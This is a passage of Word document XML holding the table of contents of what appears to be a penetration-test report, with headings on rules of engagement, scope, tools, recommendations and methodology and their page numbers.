                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. Goals Objectives &amp; Attack Scenario [If needed]:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498956 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C591EB7" w14:textId="716E1ABD" w:rsidR="008D468E" w:rsidRDefault="008D468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57" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Summary of Business Risks:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498957 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21FC007D" w14:textId="56CB0905" w:rsidR="008D468E" w:rsidRDefault="008D468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58" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Recommendations:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498958 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BAB831D" w14:textId="353D8BD1" w:rsidR="008D468E" w:rsidRDefault="008D468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59" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Conclusion:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498959 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DD1E938" w14:textId="79F099BA" w:rsidR="008D468E" w:rsidRDefault="008D468E">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60" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>RULES OF ENGAGEMENT RoE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498960 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58ECE295" w14:textId="0E2616AF" w:rsidR="008D468E" w:rsidRDefault="008D468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61" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Time Details:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498961 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12BD54C9" w14:textId="6663226A" w:rsidR="008D468E" w:rsidRDefault="008D468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62" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Tests Details</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498962 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="046A50A8" w14:textId="2DCEDE90"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63" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Performed Tests</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498963 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DA4E1E4" w14:textId="61C5C12E"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64" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Test Info</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498964 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="397AF61E" w14:textId="25EC97BC"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65" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Vectors and Components</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498965 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D40B457" w14:textId="2AECCF75"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66" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Security Objectives and Principles</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498966 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76534678" w14:textId="6FC2018A"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67" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Legal and Compliance Considerations:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498967 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73C353C4" w14:textId="2C3FF656" w:rsidR="008D468E" w:rsidRDefault="008D468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68" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Scope Details</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498968 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27716EE1" w14:textId="45427DD4"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69" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Restrictions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498969 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45B77E23" w14:textId="56668655"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70" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Environment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498970 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B6EDABC" w14:textId="41981358" w:rsidR="008D468E" w:rsidRDefault="008D468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71" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Access Permissions and Tools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498971 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56CA25DA" w14:textId="429EDB4E"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72" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Access Permissions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498972 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="241B07F2" w14:textId="12A93E9D"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73" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Tools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498973 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C0C8A08" w14:textId="32FA99DC" w:rsidR="008D468E" w:rsidRDefault="008D468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74" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Engagement Goals</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498974 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48183ACF" w14:textId="757B72D1" w:rsidR="008D468E" w:rsidRDefault="008D468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75" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Questions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498975 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6494F23C" w14:textId="7DE10A8F" w:rsidR="008D468E" w:rsidRDefault="008D468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76" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Approval and Acknowledgements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498976 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="411DDC3C" w14:textId="0240A266" w:rsidR="008D468E" w:rsidRDefault="008D468E">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77" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Methodology</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498977 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
